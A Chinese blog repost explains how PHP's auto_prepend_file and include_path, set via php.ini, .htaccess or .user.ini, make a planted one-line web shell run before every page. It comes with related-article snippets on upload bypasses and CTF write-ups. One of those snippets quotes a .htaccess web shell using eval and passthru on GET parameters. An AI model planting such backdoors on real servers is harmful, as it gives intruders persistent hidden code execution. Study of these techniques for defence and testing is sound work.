后门---php.ini/.htaccess/.user.ini-------------------利用 auto_prepend_file 和 include_path

最新推荐文章于 2023-06-29 19:04:50 发布
最新推荐文章于 2023-06-29 19:04:50 发布
阅读量818 收藏 1
点赞数
原文链接:https://www.jianshu.com/p/1c6babd89dcc
版权
From:http://www.cnblogs.com/iamstudy/articles/php_ini_backdoor.html

原理

  • php.ini中有这几种模式:

    • PHP_INI_*模式的定义
  • 文件配置属性
  • 官方解释

  • auto_prepend_file 意味这是在php脚本执行前会执行这个参数设置的脚本,然后这个参数的脚本所在目录受include_path限制

  • append是在php脚本执行后才执行的,但是要注意的是遇到exit()的时候,这个脚本也不能运行

  • 然后这两个能在php.ini、.htaccess、httpd.conf设置,但是看了P师傅写的, 除了PHP_INI_SYSTEM以外的模式(包括PHP_INI_ALL)都是可以通过.user.ini来设置的

实践

  • 在php.ini里面设置:
设置1
  • 然后添加:
设置2
  • 在/tmp目录下新建一个目录a,在目录a下新建一个aa.php文件,文件内容可以是php一句话或者phpinfo等任何php形式的文件内容,注意设置好aa.php的文件权限,否则会出现500的报错。
文件内容

  • 在浏览器直接访问index.php页面,可以发现不仅显示除了index.php的内容,而且也可以执行aa.php里面的一句话木马了。

    • 页面显示

参考连接
.heaccess后门

bylfsj
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3165
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
upload-labs文件上传靶场实验
chenrs727的博客
09-15 1163
·第一关 前端JS绕过 上传一个含php一句话的jpg文件,然后使用burp抓包 然后将1.jpg改成1.php直接发包完成绕过 然后打开图像链接即完成 第二关
PHPauto_prepend_fileauto_append_file用法实例分析
10-25
主要介绍了PHPauto_prepend_fileauto_append_file用法,较为详细的讲述了配置信息的休息以及函数的用法和注意事项,需要的朋友可以参考下
.htaccess 后门
weixin_30512089的博客
08-11 289
<?php <Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess # <?php @eval($_GET[value]);?> # or <?php passthru($_GET['c...
.htaccess后门
weixin_30764883的博客
01-17 183
PHP手册,常看常新:) PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置. 恰好,找到两个邪恶的属性: auto_prepend_file string 指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path。 特殊值 none 禁止了自动前缀。 au...
auto_prepend_fileauto_append_file使用方法
热门推荐
傲雪星枫
09-05 3万+
auto_prepend_fileauto_append_file使用方法 如果需要将文件require到所有页面的顶部与底部。 第一种方法:在所有页面的顶部与底部都加入require语句。
php.ini中的auto_prepend_fileauto_append_file的用法
程序员无为的博客
03-11 789
配置示例: auto_prepend_file = "/path/to/header.php" auto_apeend_file = "/path/to/footer.php" 这样每次在加载访问的php文件之前,会先加载header.php文件,在访问php文件结束之后会加载footer.php。 在一些需要对代码特殊处理的地方,这两个配置就非常的好用,只要你脑洞足够大,可以很多你想做的事情。...
文件上传绕过2——.uaer.ini+二次渲染
最新发布
xiaoheizi的博客
06-29 260
user.ini就是一个可以由用户”自定义“的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。新建一个文件名为.user.ini的文件,并将内容写为:auto_prepend_file=1.jpg,将.user.ini上传至服务器。gif可以直接在图片插入图片马,jpg png不建议直接在图片插入脚本代码,可以在网上找图片马生成脚本运行。想要.user.ini文件生效需要一个索引,就是说需要在上传文件的存储路径下有个.php可执行文件。
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3749
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客大挑战 2019]Http 修改头 [...
[红日安全]Web安全Day5 - 任意文件上传实战攻防
hongrisec的博客
02-26 1239
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
.htaccess做更隐蔽的后门
weixin_34269583的博客
05-21 200
作者:kindle From:http://key0.cn/?p=285 万恶的引用功能,下文复制粘贴无用,请自行将双引号修改 .htaccess内容如下 #首先允许web访问这个文件 <Files ~ “^\.ht”> Order allow,deny Allow from all </Files> RedirectMatch ...
PHP 配置 之 auto_prepend_file
pear213的专栏
05-24 1089
auto_prepend_file
.htaccess文件构成的PHP后门
浅笑996的博客
06-28 2693
1、.htaccess文件 2、文件上传绕过 一般.htaccess可以用来留后门和针对黑名单绕过 创建一个txt写入(png解析为php) AddTypeapplication/x-httpd-php.png 另存为.htaccess 上传.htaccess 必须是网站根路径 3、留后门 可以在.htaccess 加入php解析规则 类似于把文件名包含1的解析成php <FilesMatch"1"> SetHandlerapplication/x-http...
file_append php,PHP中的auto_prepend_fileauto_append_file
weixin_32708653的博客
03-20 768
在开发PHP程序的时候,我们有时候会在每个PHP的脚本的开头和结尾编写相同的代码。比如,我们常常需要在每个PHP页面中打开和关闭session或者建立和关闭数据库连接。优秀的程序员通常会寻找一种简单的方式以避免编写相同的代码。在PHP的配置文件中,有两个配置项auto_prepend_fileauto_append_file,我们可以为这两个配置项指定两个不同的文件,让这两个文件中的代码在分别在...
php append,php.ini配置php auto_prepend_fileauto_append_file参数
weixin_32518317的博客
03-12 842
php.ini 中有两个配置参数,auto_prepend_fileauto_append_file,其作用相当于php代码 require 或 include,使用这两个指令包含的文件如果该文件不存在,将产生一个警告。auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件auto_append_file 表示在php代码执行完毕后加载指定的php文件在某...
php.ini 配置auto_prepend_fileauto_append_file
a8927747的专栏
05-30 2781
一般都使用require()将页眉和脚注加入到每个页面中,但是除了传统的直接require以外,还有一种办法,就是使用配置文件php.ini中的两个选项auto_prepend_fileauto_append_file。 通过这两个选项来设置页眉和脚注,可以保证它们在每个页面的前后被载入。 使用这些指令包含的文件可以像使用include()语句包含的文件一样;也就是,如果该文件不存在,将产生
小识.htaccess文件
aijie6150的博客
10-18 316
.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过ht...
.htaccess和.user.ini
nigo134的博客
07-23 1041
.htaccess是什么 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定
.htaccess详细使用指南 - 网站配置必备手册
"htaccess手册" `.htaccess` 文件是一个配置文件,用于在 Apache Web 服务器上实现特定的网站控制和重定向规则。它是基于每个目录的配置文件,允许非管理员级别的用户通过更改此文件来调整服务器的行为。这个手册...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值